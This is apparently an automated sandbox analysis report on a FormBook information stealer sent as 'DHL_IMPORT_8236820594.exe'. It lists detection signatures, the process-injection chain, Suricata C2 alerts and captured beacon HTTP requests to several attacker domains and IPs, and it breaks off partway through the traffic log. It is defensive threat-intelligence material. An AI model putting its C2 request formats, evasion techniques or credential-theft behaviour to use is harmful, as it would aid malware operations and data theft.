
Windows Analysis Report
DHL_IMPORT_8236820594.exe

Overview

General Information

Sample name: DHL_IMPORT_8236820594.exe
Analysis ID: 1547007
MD5: 2f01c94df712e58b8227588ba7a376c6
SHA1: 05b93bdaf9c8bdb42e6888e2f1d292ad1b9bc908
SHA256: 5a8b2ff82ebbee4b3d5baf85be0af29029669da8c2cde057affaca52c5c94fc0
Tags: dhl exe geo ROU user-NDA0E
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Update Standalone Installer command line found (may be used to bypass UAC)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DHL_IMPORT_8236820594.exe (PID: 7028 cmdline: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe" MD5: 2F01C94DF712E58B8227588BA7A376C6)
    • svchost.exe (PID: 3448 cmdline: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • AUHJGnjYgKTjWw.exe (PID: 6016 cmdline: "C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wusa.exe (PID: 6260 cmdline: "C:\Windows\SysWOW64\wusa.exe" MD5: EB96F0F207F203DD0B6D8A2625270495)
        • net.exe (PID: 2588 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • AUHJGnjYgKTjWw.exe (PID: 4340 cmdline: "C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3756 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further memory-dump entries are collapsed in the report view)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ParentImage: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, ParentProcessId: 7028, ParentProcessName: DHL_IMPORT_8236820594.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ProcessId: 3448, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ParentImage: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, ParentProcessId: 7028, ParentProcessName: DHL_IMPORT_8236820594.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ProcessId: 3448, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T19:43:05.133750+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-01T19:43:44.039474+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49736 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T19:44:02.875031+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49822 | 188.114.96.3 | 80 | TCP
2024-11-01T19:44:05.578168+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49836 | 188.114.96.3 | 80 | TCP
2024-11-01T19:44:08.172209+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49853 | 188.114.96.3 | 80 | TCP
2024-11-01T19:44:16.407692+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49900 | 3.33.130.190 | 80 | TCP
2024-11-01T19:44:18.981201+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49916 | 3.33.130.190 | 80 | TCP
2024-11-01T19:44:21.525519+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49932 | 3.33.130.190 | 80 | TCP
2024-11-01T19:44:30.546887+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49981 | 154.23.184.95 | 80 | TCP
2024-11-01T19:44:33.109508+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49996 | 154.23.184.95 | 80 | TCP
2024-11-01T19:44:35.609511+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50011 | 154.23.184.95 | 80 | TCP
2024-11-01T19:44:44.513285+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 172.67.185.22 | 80 | TCP
2024-11-01T19:44:47.090485+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 172.67.185.22 | 80 | TCP
2024-11-01T19:44:49.639229+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50018 | 172.67.185.22 | 80 | TCP
2024-11-01T19:44:58.423225+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50020 | 206.119.82.172 | 80 | TCP
2024-11-01T19:45:00.987680+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50021 | 206.119.82.172 | 80 | TCP
2024-11-01T19:45:03.578156+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50022 | 206.119.82.172 | 80 | TCP
2024-11-01T19:45:21.875133+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50024 | 103.191.208.137 | 80 | TCP
2024-11-01T19:45:24.423787+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50025 | 103.191.208.137 | 80 | TCP
2024-11-01T19:45:26.984652+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50026 | 103.191.208.137 | 80 | TCP
2024-11-01T19:45:36.437601+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50028 | 3.111.160.216 | 80 | TCP
2024-11-01T19:45:38.984458+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50029 | 3.111.160.216 | 80 | TCP
2024-11-01T19:45:41.671964+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50030 | 3.111.160.216 | 80 | TCP
2024-11-01T19:45:50.047522+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50032 | 203.161.49.193 | 80 | TCP
2024-11-01T19:45:52.949936+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50033 | 203.161.49.193 | 80 | TCP


                AV Detection

Source: DHL_IMPORT_8236820594.exe, Avira: detected
Source: DHL_IMPORT_8236820594.exe, ReversingLabs: Detection: 63%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: DHL_IMPORT_8236820594.exe, Joe Sandbox ML: detected
Source: DHL_IMPORT_8236820594.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wusa.pdbGCTL, source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: net.pdbUGP, source: svchost.exe, 00000002.00000003.2065035000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064660770.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000002.3517989845.0000000000C68000.00000004.00000001.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000003.2034900857.0000000000C5D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wusa.pdb, source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, source: AUHJGnjYgKTjWw.exe, 00000005.00000000.2012569159.000000000073E000.00000002.00000001.01000000.00000005.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3517387666.000000000073E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP, source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1840438960.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1992925679.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1994300850.0000000003700000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2129162021.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2126611364.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.000000000304E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb, source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1840438960.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2108190018.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1992925679.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1994300850.0000000003700000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000007.00000002.3518629884.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2129162021.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2126611364.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.000000000304E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb, source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3519002309.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000000.2197878687.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FBCC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP, source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3519002309.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000000.2197878687.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FBCC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: net.pdb, source: svchost.exe, 00000002.00000003.2065035000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064660770.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000002.3517989845.0000000000C68000.00000004.00000001.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000003.2034900857.0000000000C5D000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_008468EE FindFirstFileW,FindClose, 0_2_008468EE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_0084698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_0084698F
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_0083D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0083D076
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_0083D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0083D3A9
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_00849642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00849642
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_0084979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0084979D
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_0083DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0083DBBE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_00849B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00849B2B
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_00845C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00845C97
Source: C:\Windows\SysWOW64\net.exe, Code function: 7_2_0049C980 FindFirstFileW,FindNextFileW,FindClose, 7_2_0049C980
Source: C:\Windows\SysWOW64\net.exe, Code function: 4x nop then xor eax, eax, 7_2_00489DE0
Source: C:\Windows\SysWOW64\net.exe, Code function: 4x nop then mov ebx, 00000004h, 7_2_02BF04EB

                Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49900 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49916 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49932 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49981 -> 154.23.184.95:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49853 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49996 -> 154.23.184.95:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 206.119.82.172:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 172.67.185.22:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 154.23.184.95:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 172.67.185.22:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 103.191.208.137:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 203.161.49.193:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 103.191.208.137:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 206.119.82.172:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 203.161.49.193:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 206.119.82.172:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 172.67.185.22:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 3.111.160.216:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 103.191.208.137:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 3.111.160.216:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 3.111.160.216:80
Source: DNS query: www.iuyi542.xyz
Source: Joe Sandbox View, IP Address: 203.161.49.193
Source: Joe Sandbox View, IP Address: 188.114.96.3
Source: Joe Sandbox View, IP Address: 188.114.96.3
Source: Joe Sandbox View, ASN Name: COGENT-174US
Source: Joe Sandbox View, ASN Name: COGENT-174US
Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49736
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49730
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, Code function: 0_2_0084CE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_0084CE44
Source: global traffic, HTTP traffic detected:
    GET /b6lw/?XbDhGVR=FO9SkkJ/zSkBY2gKE3XjGE22XLVH89fAFT5UFdCZW5l7B5PRw+4+Jbotmp48rM/okqGzRuEUvPhZhQzUiZGHGB1tKbDdMwj50dTtgpwp3v/R5pIWGJdc6oQ=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
    Host: www.iuyi542.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic, HTTP traffic detected:
    GET /o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
    Host: www.vrxlzluy.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic, HTTP traffic detected:
    GET /3c6w/?XbDhGVR=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
    Host: www.trifecta.center
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic, HTTP traffic detected:
    GET /rj0s/?XbDhGVR=wwfrpq2GStq8yXhruzchqPI2DPKMclx/34kF3CMx+1v+TSw3PCRza/Sx++Q9wxTideP8HMqKtaf0MdZtX7Zp7/WG/Y2BEJVTn7MuHEHfS2P/6TB7VaKsbng=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
    Host: www.wcp95.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic, HTTP traffic detected:
    GET /xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3+04tAjUV11hc/ilEwtgrKZz4woi/xCbjO8SSPcCwKsmvKoPyP7HvBY60bpiIs0q+jugQSLxZIHi4ORfVnf3fP4vxqk9k0cQ=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
    Host: www.gokulmohan.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic, HTTP traffic detected:
    GET /a3g3/?XbDhGVR=wGzSOeLMOeJZKE1qNEa+jhNIWFM/28bU2ce+YDYhk9OHSMfA8Wvg3+EpArxXMTGJwIf87CGML3FOIiYWeXpTMV044XgXGpvZX0LmL4PHT1yh05kop8D3Fas=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
    Host: www.wddb97.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic, HTTP traffic detected:
    GET /3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
    Host: www.roopiedutech.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic, HTTP traffic detected:
